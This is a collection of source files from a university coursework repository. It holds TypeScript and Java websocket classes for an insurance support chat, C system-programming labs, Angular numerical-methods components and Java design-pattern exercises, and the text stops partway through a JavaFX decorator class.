accept(visitor: WsNotificationVisitor)\n}\n\nexport class SupportMessage{\n text: string;\n fromSupport: boolean;\n\n constructor(text: string, fromSupport: boolean) {\n this.text = text;\n this.fromSupport = fromSupport;\n }\n}\n\nexport class NewQuestionNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitNewQuestionNotification(this)\n }\n\n message: SupportMessage;\n clientId: string;\n\n constructor(message: SupportMessage, clientId: string) {\n this.message = message;\n this.clientId = clientId;\n }\n}\n\nexport class NewClientNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitNewClientNotification(this)\n }\n clientId: string;\n\n constructor(clientId: string) {\n this.clientId = clientId;\n }\n}\n\nexport class NewAnswerNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitNewAnswerNotification(this)\n }\n\n message: SupportMessage;\n\n constructor(message: SupportMessage) {\n this.message = message;\n }\n}\n\nexport class ClientDisconnectNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitClientDisconnectNotification(this)\n }\n\n clientId: string;\n\n constructor(clientId: string) {\n this.clientId = clientId;\n }\n}\n\nexport class FreeClientListNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitFreeClientListNotification(this)\n }\n\n clients: string[];\n\n constructor(clients: string[]) {\n this.clients = clients;\n }\n}\n\nexport class ClientAssignedNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitClientAssignedNotification(this)\n }\n\n clientId: string;\n toRecv: boolean;\n\n constructor(clientId: string, toRecv:boolean) {\n this.clientId = clientId;\n this.toRecv 
= toRecv;\n }\n}\n\nexport class MessageListNotification implements WsNotification{\n accept(visitor: WsNotificationVisitor) {\n visitor.visitMessageListNotification(this);\n }\n\n clientId: string;\n messages: SupportMessage[];\n\n constructor(clientId: string, messages: SupportMessage[]) {\n this.clientId = clientId;\n this.messages = messages;\n }\n}\n\nexport class WsRequest{\n tag: String;\n\n constructor(tag: String) {\n this.tag = tag;\n }\n}\n\nexport class FreeClientListRequest extends WsRequest{\n constructor(){\n super('do-list-free');\n }\n}\n\nexport class AssignClientRequest extends WsRequest{\n constructor(clientId: string) {\n super('do-assign-client');\n this.clientId = clientId;\n }\n clientId: string;\n}\n\nexport class AnswerClientRequest extends WsRequest{\n clientId: string;\n message: string;\n\n constructor(clientId: string, message: string) {\n super('do-answer');\n this.clientId = clientId;\n this.message = message;\n }\n}\n\nexport class ListClientMessagesRequest extends WsRequest{\n clientId: string;\n\n constructor(clientId: string) {\n super('do-list-client-messages');\n this.clientId = clientId;\n }\n}\n\nexport class UnassignClientRequest extends WsRequest{\n clientId: string;\n constructor(cliendId: string){\n super(\"do-unassign-client\");\n this.clientId = cliendId;\n }\n}\n" }, { "alpha_fraction": 0.7054263353347778, "alphanum_fraction": 0.7209302186965942, "avg_line_length": 42, "blob_id": "c95b74b65298d833229b27bf6797306575607cd9", "content_id": "6b87bd38902b08cc6f5302c30a91273ceb86cc6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 129, "license_type": "no_license", "max_line_length": 69, "num_lines": 3, "path": "/system_programming/lab1/task1/run.sh", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "rm build/main;\ncc -std=c99 -Wall -Wextra -Wpedantic \"main.c\" -g -ggdb -o build/main;\n./build/main build/sample build/output_file\n" }, { "alpha_fraction": 0.7654462456703186, "alphanum_fraction": 0.7654462456703186, "avg_line_length": 38.727272033691406, "blob_id": "df9b9c588f7b1387f658b27894fb32dbd3a06116", "content_id": "eee3cfd10ecacd765ae5afd55116aff8d1cf13c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 874, "license_type": "no_license", "max_line_length": 103, "num_lines": 22, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/websocket/PingFilterWebSocketDecorator.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.websocket;\n\nimport org.springframework.web.socket.TextMessage;\nimport org.springframework.web.socket.WebSocketHandler;\nimport org.springframework.web.socket.WebSocketMessage;\nimport org.springframework.web.socket.WebSocketSession;\nimport org.springframework.web.socket.handler.WebSocketHandlerDecorator;\n\npublic class PingFilterWebSocketDecorator extends WebSocketHandlerDecorator {\n @Override\n public void handleMessage(WebSocketSession session, WebSocketMessage<?> message) throws Exception {\n if(message instanceof TextMessage){\n TextMessage msg = (TextMessage) message;\n if(msg.getPayload().equals(\"ping\")) return;\n }\n getDelegate().handleMessage(session, message);\n }\n\n public PingFilterWebSocketDecorator(WebSocketHandler delegate) {\n super(delegate);\n }\n}\n" }, { "alpha_fraction": 0.8319672346115112, "alphanum_fraction": 0.8319672346115112, "avg_line_length": 33.85714340209961, "blob_id": 
"f6bdc45e2b6c2ae0603cf7507f93be6a0b1bfadb", "content_id": "8808a752fb4a8f056ded6a345291689cca592809", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 244, "license_type": "no_license", "max_line_length": 69, "num_lines": 7, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/repository/UserRepository.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.repository;\n\nimport io.github.k_gregory.insurance.entity.User;\nimport org.springframework.data.jpa.repository.JpaRepository;\n\npublic interface UserRepository extends JpaRepository<User, String> {\n}\n" }, { "alpha_fraction": 0.6413043737411499, "alphanum_fraction": 0.6431159377098083, "avg_line_length": 21.079999923706055, "blob_id": "b40dc8053b153f56dccc60a57ac3cc1e39e98029", "content_id": "db57d7171d86ac6d98f731640cc250123a309441", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 552, "license_type": "no_license", "max_line_length": 77, "num_lines": 25, "path": "/numerical-methods/src/app/file-input/file-input.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {Component, EventEmitter, Input, OnInit, Output} from '@angular/core';\n\n@Component({\n selector: 'app-file-input',\n templateUrl: './file-input.component.html',\n styleUrls: ['./file-input.component.css']\n})\nexport class FileInputComponent {\n file: any;\n\n @Input() caption: string;\n @Output() loaded = new EventEmitter<String>();\n\n constructor() { }\n\n fileChanged(ev){\n this.file = ev.target.files[0];\n\n const fr = new FileReader();\n fr.onload = (e)=>{\n this.loaded.emit(fr.result);\n };\n fr.readAsText(this.file);\n }\n}\n" }, { "alpha_fraction": 0.6780303120613098, "alphanum_fraction": 0.683080792427063, "avg_line_length": 17.418603897094727, "blob_id": "9af23e1466f7acfb7db11247536a1beb2d259a72", "content_id": "e272313e5639a1f9ccbf331e01b2a5a6e8bdfa90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 792, "license_type": "no_license", "max_line_length": 61, "num_lines": 43, "path": "/insurance/frontend/src/websocket/ConnectionContext.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "export interface SendableState{\n writeMessage(msg:any);\n replace(s: SendableState)\n}\n\nexport class BufferSendableState implements SendableState{\n replace(s: SendableState) {\n this.buffer.forEach(msg=>s.writeMessage(msg))\n }\n\n buffer: any[] = [];\n\n writeMessage(msg: any) {\n this.buffer.push(msg)\n }\n}\n\nexport class WebSocketSendableState implements SendableState{\n replace(s: SendableState) {\n }\n\n constructor(private ws: WebSocket){\n setInterval(()=>ws.send(\"ping\"), 1000)\n }\n\n writeMessage(msg: any) {\n this.ws.send(msg)\n }\n\n}\n\nexport class ConnectionContext{\n state: SendableState;\n\n setState(s: SendableState){\n if(this.state != null) this.state.replace(s);\n this.state = s;\n }\n\n write(msg: any){\n this.state.writeMessage(JSON.stringify(msg));\n }\n}\n" }, { "alpha_fraction": 0.5412458181381226, "alphanum_fraction": 0.560606062412262, "avg_line_length": 17.5625, "blob_id": "b8ac3c658fd60711edeb5a13a9954ae52544bc61", "content_id": "375ded115cb95b8625494ce0e1168675328a279a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 78, 
"num_lines": 64, "path": "/system_programming/lab1/task2/main.c", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "#include <sys/select.h>\n#include <sys/types.h>\n#include <unistd.h>\n\n#include <stdio.h>\n#include <stdlib.h>\n\n// Max buffer size is 1024 and 1 byte for \\0\nstatic const size_t BUFF_SIZE = 1024 + 1;\n\nint main(int argc, char *argv[]) {\n int exit_code;\n char *buffer;\n fd_set rfds;\n\n exit_code = EXIT_FAILURE;\n\n if (argc != 2) {\n fprintf(stderr, \"Usage: %s ID\\n\", argv[0]);\n goto EXIT;\n }\n\n buffer = malloc(BUFF_SIZE);\n\n while (1) {\n int retval;\n struct timeval tv;\n\n tv.tv_sec = 5;\n tv.tv_usec = 0;\n\n FD_ZERO(&rfds);\n FD_SET(STDIN_FILENO, &rfds);\n\n retval = select(STDIN_FILENO + 1, &rfds, NULL, NULL, &tv);\n\n if (retval < 0) {\n perror(\"select()\");\n goto CLEANUP_BUFFER;\n }\n\n if(retval == 0) {\n printf(\"%s no input for 5 sec\\n\", argv[1]); \n }\n\n if (retval > 0) {\n // STDIN_FILENO is the only descriptor in set, no need to check FD_ISSET\n if (fgets(buffer, BUFF_SIZE, stdin) != NULL) {\n printf(\"%s got: %s\", argv[1], buffer);\n } else { // fgets returns NULL\n\tputs(\"Exiting...\");\n break;\n }\n }\n }\n\n exit_code = EXIT_SUCCESS;\n\nCLEANUP_BUFFER:\n free(buffer);\n\nEXIT:\n exit(exit_code);\n}\n" }, { "alpha_fraction": 0.6243256330490112, "alphanum_fraction": 0.6591466665267944, "avg_line_length": 38.779998779296875, "blob_id": "4747b970d28ba3c1fa8cbf5753073b0a2be1e087", "content_id": "c952d585b384380527ca96a942e90865ddebfc58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 2039, "license_type": "no_license", "max_line_length": 112, "num_lines": 50, "path": "/oldtest/rss-reader/build.gradle", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "group 'io.github.k-gregory.otp'\r\nversion '1.0-SNAPSHOT'\r\n\r\nbuildscript {\r\n repositories {\r\n mavenCentral()\r\n }\r\n dependencies {\r\n classpath(\"org.springframework.boot:spring-boot-gradle-plugin:1.5.2.RELEASE\")\r\n }\r\n}\r\n\r\napply plugin: 'java'\r\napply plugin: 'org.springframework.boot'\r\n\r\nsourceCompatibility = 1.8\r\n\r\nrepositories {\r\n mavenCentral()\r\n}\r\n\r\ndependencies {\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-devtools', version: '1.5.3.RELEASE'\r\n\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-starter-data-jpa', version: '1.5.3.RELEASE'\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-starter-web', version: '1.5.3.RELEASE'\r\n compile group: 'org.springframework.boot', name: 'spring-boot-starter-jdbc', version: '1.5.3.RELEASE'\r\n\r\n compile group: 'org.springframework.data', name: 'spring-data-jpa', version: '1.11.3.RELEASE'\r\n compile group: 'org.springframework', name: 'spring-web', version: '4.3.8.RELEASE'\r\n\r\n\r\n compile group: 'com.h2database', name: 'h2', version: '1.4.195'\r\n compile group: 'org.postgresql', name: 'postgresql', version: '42.0.0'\r\n compile group: 'org.hibernate', name: 'hibernate-core', version: '5.2.10.Final'\r\n\r\n compile group: 'com.google.guava', name: 'guava', version: '21.0'\r\n compile group: 'org.jsoup', name: 'jsoup', version: '1.10.2'\r\n compile group: 'org.apache.lucene', name: 'lucene-snowball', version: '3.0.3'\r\n\r\n\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-starter-web', version: '1.5.3.RELEASE'\r\n //compile group: 'org.springframework.boot', name: 'spring-boot-starter-thymeleaf', version: '1.5.3.RELEASE'\r\n /*\r\n compile 
group: 'org.springframework', name: 'spring-orm', version: '4.3.8.RELEASE'\r\n compile group: 'com.zaxxer', name: 'HikariCP', version: '2.6.1'\r\n compile group: 'org.hibernate', name: 'hibernate-core', version: '5.2.10.Final'\r\n compile group: 'org.postgresql', name: 'postgresql', version: '42.0.0'\r\n */\r\n}\r\n" }, { "alpha_fraction": 0.5813252925872803, "alphanum_fraction": 0.5890227556228638, "avg_line_length": 20.342857360839844, "blob_id": "af60a9dd74a566d186a460bef1d9d7c0fbd05709", "content_id": "0d5dd5f31d0519c79dccee671a878dbfc261ab95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2988, "license_type": "no_license", "max_line_length": 77, "num_lines": 140, "path": "/system_programming/lab1/task1/main.c", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "#include <fcntl.h>\n#include <sys/stat.h>\n#include <sys/types.h>\n#include <unistd.h>\n\n#include <ctype.h>\n#include <errno.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nstatic const size_t BUFF_SIZE = 7;\n\n/*\n * Reads data from src_fd, lowers it and writes to dest_fd\n * Returns count of bytes sent\n * On error, returns -1 and sets errno\n * This function doesn't close the FDs\n */\nssize_t lowering_sendfile(int src_fd, int dest_fd, void *_buffer,\n size_t buffer_size) {\n ssize_t read_bytes;\n size_t bytes_counter;\n char *buffer;\n\n buffer = _buffer;\n bytes_counter = 0;\n\n do {\n ssize_t i;\n char *buffer_pos, *buffer_end;\n\n read_bytes = read(src_fd, buffer, buffer_size);\n\n if (read_bytes < 0) {\n return -1;\n }\n\n buffer_pos = buffer;\n buffer_end = buffer + read_bytes;\n\n for (i = 0; i < read_bytes; i++) {\n /* TODO: Doesn't work with Unicode */\n buffer[i] = tolower(buffer[i]);\n }\n\n while (buffer_pos != buffer_end) {\n ssize_t wrote_bytes;\n\n wrote_bytes = write(dest_fd, buffer_pos, buffer_end - buffer_pos);\n if (wrote_bytes < 0) {\n return -1;\n }\n\n buffer_pos += wrote_bytes;\n }\n\n bytes_counter += read_bytes;\n } while (read_bytes != 0);\n\n return bytes_counter;\n}\n\nint main(int argc, char *argv[]) {\n int exit_code;\n\n int in_fd, out_fd;\n\n ssize_t bytes_written;\n void *buffer;\n\n int stat_code;\n struct stat in_stat_info, out_stat_info;\n\n exit_code = EXIT_FAILURE;\n\n if (argc != 3) {\n fprintf(stderr, \"Usage: %s SRC DEST\\n\", argv[0]);\n goto EXIT;\n }\n\n stat_code = stat(argv[1], &in_stat_info);\n if (stat_code < 0) {\n perror(\"Bad input file\");\n goto EXIT;\n }\n\n stat_code = stat(argv[2], &out_stat_info);\n if (stat_code < 0 && (errno != ENOENT)) {\n perror(\"Bad output file\");\n goto EXIT;\n } else if (stat_code == 0) { /* Check that input file is not output file */\n if (in_stat_info.st_dev == out_stat_info.st_dev &&\n in_stat_info.st_ino == out_stat_info.st_ino) {\n fputs(\"SRC and DEST must be different files\", stderr);\n goto EXIT;\n }\n }\n\n buffer = malloc(BUFF_SIZE);\n\n in_fd = open(argv[1], O_RDONLY);\n if (in_fd < 0) {\n perror(\"Can't open input file\");\n goto CLEANUP_BUFFER;\n }\n\n out_fd = open(argv[2], O_CREAT | O_WRONLY | O_TRUNC,\n S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);\n if (out_fd < 0) {\n perror(\"Can't open output file\");\n goto CLEANUP_IN_FD;\n }\n\n bytes_written = lowering_sendfile(in_fd, out_fd, buffer, BUFF_SIZE);\n if (bytes_written < 0) {\n perror(\"Can't copy file contents\");\n goto CLEANUP_OUT_FD;\n }\n printf(\"Wrote %ld bytes\\n\", bytes_written);\n\n exit_code = EXIT_SUCCESS;\n\nCLEANUP_OUT_FD:\n if (close(out_fd) != 0) {\n perror(\"Can't close output file\");\n 
exit_code = EXIT_FAILURE;\n }\n\nCLEANUP_IN_FD:\n if (close(in_fd) != 0) {\n perror(\"Can't close input file\");\n exit_code = EXIT_FAILURE;\n }\n\nCLEANUP_BUFFER:\n free(buffer);\n\nEXIT:\n exit(exit_code);\n}\n" }, { "alpha_fraction": 0.6309834718704224, "alphanum_fraction": 0.6335944533348083, "avg_line_length": 22.446807861328125, "blob_id": "2d29f73264a990082a3db9048c019b7149f92ce3", "content_id": "46b9568b9b2fc69c51181bae874eb34dabc55b2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1149, "license_type": "no_license", "max_line_length": 53, "num_lines": 47, "path": "/otp/src/main/java/io/github/k_gregory/otp/lab2/datatypes/MathVal.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.otp.lab2.datatypes;\r\n\r\nimport io.github.k_gregory.otp.lab2.MathValVisitor;\r\n\r\npublic abstract class MathVal {\r\n public abstract MathVal accept(MathValVisitor v);\r\n\r\n public MathVal mul(MathVal right) {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal plus(MathVal right) {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal vMul(MathVal right) {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal transpose() {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal inverse() {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal absolute() {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal matMul(MathVal other) {\r\n throw new UnsupportedOperationException();\r\n }\r\n\r\n public MathVal negate() {\r\n return mul(new NumVal(-1.d));\r\n }\r\n\r\n public MathVal div(MathVal right) {\r\n return mul(right.inverse());\r\n }\r\n\r\n public MathVal minus(MathVal right) {\r\n return plus(right.negate());\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.7457627058029175, "alphanum_fraction": 0.7457627058029175, "avg_line_length": 28.5, "blob_id": "cf386b4a8087a5bafaf879231c5244947247dc62", "content_id": "5a456cd97724bda0e8693b682e92332968273bd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 295, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/data/NewAnswerNotification.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult.data;\n\npublic class NewAnswerNotification extends ConsultNotification{\n public final SupportMessage message;\n\n public NewAnswerNotification(SupportMessage message) {\n super(\"new-answer\");\n this.message = message;\n }\n}\n" }, { "alpha_fraction": 0.5731394290924072, "alphanum_fraction": 0.5778443217277527, "avg_line_length": 19.330434799194336, "blob_id": "1365526eccc53f75a8d4c21abc9c036ce4d47a1b", "content_id": "7c1f2373e1ac33025c4bf7dfdd98eab28ca4cc8f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 2377, "license_type": "no_license", "max_line_length": 53, "num_lines": 115, "path": "/numerical-methods/src/app/newton-first/newton-first.component.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import {Component} from '@angular/core';\nimport {decodeCsv, getControls} from '../csv'\nimport {newton_first} from \"../newton\";\nimport {ChartDataSets, ChartOptions} from \"chart.js\";\n\n\n@Component({\n selector: 
'app-newton-first',\n templateUrl: './newton-first.component.html',\n styleUrls: ['./newton-first.component.css']\n})\nexport class NewtonFirstComponent {\n error?: string;\n\n inputFunction?: {x: number, y: number}[];\n controlFunction: {x: number, y: number}[];\n\n selectedPoint: {x: number, y: number};\n\n point?: string;\n result?: number;\n\n colors: any;\n chartDss? : ChartDataSets[] = null;\n\n\n constructor() { }\n\n options : ChartOptions = {\n tooltips: {\n enabled: true\n }\n };\n\n updateDss(){\n const base : ChartDataSets = {\n label: 'Вхідна функція',\n data: this.inputFunction,\n showLine: true\n };\n\n const cls = [{\n pointBackgroundColor: 'blue'\n }];\n const res: ChartDataSets[] = [base];\n\n if(this.controlFunction){\n res.push({\n label: 'Контрольні точки',\n data: this.controlFunction,\n });\n cls.push({\n pointBackgroundColor: 'rgba(255, 0, 0)'\n });\n }\n\n if(this.selectedPoint){\n console.log(\"x\");\n res.push({\n label: 'Обрана точка',\n data: [this.selectedPoint]\n });\n cls.push({\n pointBackgroundColor: 'rgba(0, 255, 0)'\n });\n }\n\n\n this.chartDss = null;\n this.colors = null;\n setTimeout(()=>{\n this.chartDss = res;\n this.colors = cls;\n }, 1)\n }\n\n\n inputSelected(csv: string){\n this.result = null;\n this.error = null;\n this.inputFunction = null;\n\n try{\n this.inputFunction = decodeCsv(csv);\n this.updateDss();\n } catch (e) {\n this.error = e.toString();\n }\n }\n\n controlSelected(csv: string){\n this.controlFunction = getControls(csv).map(x=>({\n x, y: newton_first(this.inputFunction, x)\n }));\n console.log(this.controlFunction);\n this.updateDss();\n }\n\n calc(){\n const x = parseFloat(this.point);\n if(isNaN(x)){\n this.error=\"Can't parse input point\";\n this.selectedPoint = null;\n } else {\n this.error = null;\n this.selectedPoint = {\n x,\n y:newton_first(this.inputFunction, x),\n };\n this.result = this.selectedPoint.y;\n this.updateDss();\n }\n }\n\n}\n" }, { "alpha_fraction": 0.5537790656089783, "alphanum_fraction": 0.5595930218696594, "avg_line_length": 22.571428298950195, "blob_id": "05da3e186a148a885c285df9f05e960f7d05aec9", "content_id": "b4f3be30856561fa22d2892c2dcec888e7d169ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 688, "license_type": "no_license", "max_line_length": 59, "num_lines": 28, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/GiftPack.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\npublic class GiftPack implements Gift {\r\n private Gift[] gifts;\r\n\r\n public GiftPack(Gift... 
gifts) {\r\n this.gifts = gifts;\r\n }\r\n\r\n public Gift[] getGifts() {\r\n return gifts;\r\n }\r\n\r\n @Override\r\n public Gift clone() throws CloneNotSupportedException {\r\n Gift[] gifts = new Gift[this.gifts.length];\r\n for (int i = 0; i < gifts.length; i++)\r\n gifts[i] = this.gifts[i].clone();\r\n GiftPack copy = (GiftPack) super.clone();\r\n copy.gifts = gifts;\r\n return copy;\r\n }\r\n\r\n @Override\r\n public void accept(GiftVisitor v) {\r\n v.visit(this);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5565438270568848, "alphanum_fraction": 0.5705209374427795, "avg_line_length": 19.86111068725586, "blob_id": "0a4912326a89c794f5477994d8e221ea0538bd34", "content_id": "633655d69ca28e63460a56e61f792a75bbe743f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 787, "license_type": "no_license", "max_line_length": 101, "num_lines": 36, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab3/task1/CarModel.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab3.task1;\r\n\r\n/**\r\n * Created by grego on 07.04.2017.\r\n */\r\npublic class CarModel implements Gift {\r\n private final String name;\r\n private boolean isBroken;\r\n\r\n public CarModel(String name) {\r\n this.name = name;\r\n }\r\n\r\n public void crush() {\r\n isBroken = true;\r\n }\r\n\r\n public void move() {\r\n System.out.println(isBroken ? \"Broken car can't move =\\\\\" : \"Car \" + name + \" model moves!\");\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return name + \" car model\";\r\n }\r\n\r\n @Override\r\n public Gift clone() throws CloneNotSupportedException {\r\n return (CarModel) super.clone();\r\n }\r\n\r\n @Override\r\n public void accept(GiftVisitor v) {\r\n v.visit(this);\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.787696897983551, "alphanum_fraction": 0.787696897983551, "avg_line_length": 37.08571243286133, "blob_id": "ef0b7c1ca7ff3c8ed1d29675eb1b05098baabce0", "content_id": "d09fdac57eeb54e086246bcde721cccab4b087d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1333, "license_type": "no_license", "max_line_length": 102, "num_lines": 35, "path": "/insurance/backend/src/main/java/io/github/k_gregory/insurance/service/consult/impl/ConsultClient.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.github.k_gregory.insurance.service.consult.impl;\n\nimport io.github.k_gregory.insurance.service.consult.ConsultCollegaue;\nimport io.github.k_gregory.insurance.service.consult.ConsultMediator;\nimport io.github.k_gregory.insurance.service.consult.data.FreeClientListNotification;\nimport io.github.k_gregory.insurance.service.consult.data.NewAnswerNotification;\nimport io.github.k_gregory.insurance.service.consult.data.SupportMessage;\nimport org.springframework.beans.factory.annotation.Autowired;\nimport org.springframework.stereotype.Component;\nimport org.springframework.web.socket.TextMessage;\nimport org.springframework.web.socket.WebSocketSession;\n\n@Component\npublic class ConsultClient extends ConsultCollegaue {\n @Autowired\n protected ConsultClient(ConsultMediator mediator) {\n super(mediator);\n }\n\n @Override\n protected void handleTextMessage(WebSocketSession session, TextMessage message) throws Exception {\n String text = objectMapper.readTree(message.getPayload()).asText();\n mediator.acceptClientQuestion(this, text);\n }\n\n @Override\n public void 
disconnectFromMediator(ConsultMediator mediator) {\n mediator.disconnectClient(this);\n }\n\n @Override\n public void connectToMediator(ConsultMediator mediator) {\n mediator.connectClient(this);\n }\n}\n" }, { "alpha_fraction": 0.7372262477874756, "alphanum_fraction": 0.7372262477874756, "avg_line_length": 19.549999237060547, "blob_id": "a72ad214fb368b71ed9174b29d11f39f0f2e41d5", "content_id": "5c6ea64ec4e87b0b6a315ff98985a83e3db9e1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 411, "license_type": "no_license", "max_line_length": 99, "num_lines": 20, "path": "/numerical-methods/src/app/my-material/my-material.module.ts", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "import { NgModule } from '@angular/core';\n\nimport {\n MatButtonModule,\n MatIconModule,\n MatListModule,\n MatSidenavModule,\n MatTableModule,\n MatToolbarModule\n} from \"@angular/material\";\n\nconst modules = [\n MatButtonModule, MatSidenavModule, MatToolbarModule, MatIconModule, MatListModule, MatTableModule\n];\n\n@NgModule({\n imports: [...modules],\n exports: [...modules]\n})\nexport class MyMaterialModule { }\n" }, { "alpha_fraction": 0.6617472171783447, "alphanum_fraction": 0.6641221642494202, "avg_line_length": 30.944133758544922, "blob_id": "84d959a32b4d76170d8672122bca148134940c49", "content_id": "46bd6f86e8c2eb26700dd432722a7d5ea8f38f14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5895, "license_type": "no_license", "max_line_length": 91, "num_lines": 179, "path": "/despat/src/main/java/io/bitbucket/gregoryk1/despat/lab1/task1/Task1.java", "repo_name": "k-gregory/KPI", "src_encoding": "UTF-8", "text": "package io.bitbucket.gregoryk1.despat.lab1.task1;\r\n\r\nimport javafx.application.Application;\r\nimport javafx.collections.FXCollections;\r\nimport javafx.collections.ObservableList;\r\nimport javafx.geometry.Pos;\r\nimport javafx.scene.Scene;\r\nimport javafx.scene.control.Button;\r\nimport javafx.scene.control.ListCell;\r\nimport javafx.scene.control.ListView;\r\nimport javafx.scene.control.TextField;\r\nimport javafx.scene.layout.HBox;\r\nimport javafx.scene.layout.Priority;\r\nimport javafx.scene.layout.VBox;\r\nimport javafx.scene.paint.Color;\r\nimport javafx.scene.text.Font;\r\nimport javafx.scene.text.Text;\r\nimport javafx.stage.Stage;\r\n\r\nimport java.text.DateFormat;\r\nimport java.util.Date;\r\n\r\ninterface MessageDrawer {\r\n void drawMessage(ListCell<Message> cell, Message msg, boolean empty);\r\n}\r\n\r\nclass Message {\r\n final String text;\r\n final Date sentAt;\r\n\r\n public Message(String text, Date sentAt) {\r\n this.text = text;\r\n this.sentAt = sentAt;\r\n }\r\n}\r\n\r\nclass BasicMessageDrawer implements MessageDrawer {\r\n private final Font preferredFont = new Font(\"Times New Roman\", 14);\r\n private final Color preferredColor = Color.BLACK;\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n if (!empty) {\r\n cell.setFont(preferredFont);\r\n cell.setTextFill(preferredColor);\r\n cell.setText(msg.text);\r\n } else {\r\n cell.setText(null);\r\n }\r\n }\r\n}\r\n\r\nabstract class MessageDrawerDecorator implements MessageDrawer {\r\n\r\n private final MessageDrawer messageDrawer;\r\n\r\n public MessageDrawerDecorator(MessageDrawer messageDrawer) {\r\n this.messageDrawer = messageDrawer;\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean 
empty) {\r\n messageDrawer.drawMessage(cell, msg, empty);\r\n }\r\n}\r\n\r\nclass ColorDecorator extends MessageDrawerDecorator {\r\n private final Color color;\r\n\r\n public ColorDecorator(MessageDrawer messageDrawer, Color color) {\r\n super(messageDrawer);\r\n this.color = color;\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n super.drawMessage(cell, msg, empty);\r\n cell.setTextFill(color);\r\n }\r\n}\r\n\r\nclass FontSizeDecorator extends MessageDrawerDecorator {\r\n private final double size;\r\n\r\n public FontSizeDecorator(MessageDrawer messageDrawer, double size) {\r\n super(messageDrawer);\r\n this.size = size;\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n super.drawMessage(cell, msg, empty);\r\n cell.setFont(new Font(cell.getFont().getName(), size));\r\n }\r\n}\r\n\r\nclass FontTypeDecorator extends MessageDrawerDecorator {\r\n private final String fontName;\r\n\r\n public FontTypeDecorator(MessageDrawer messageDrawer, String fontName) {\r\n super(messageDrawer);\r\n this.fontName = fontName;\r\n }\r\n\r\n @Override\r\n public void drawMessage(ListCell<Message> cell, Message msg, boolean empty) {\r\n super.drawMessage(cell, msg, 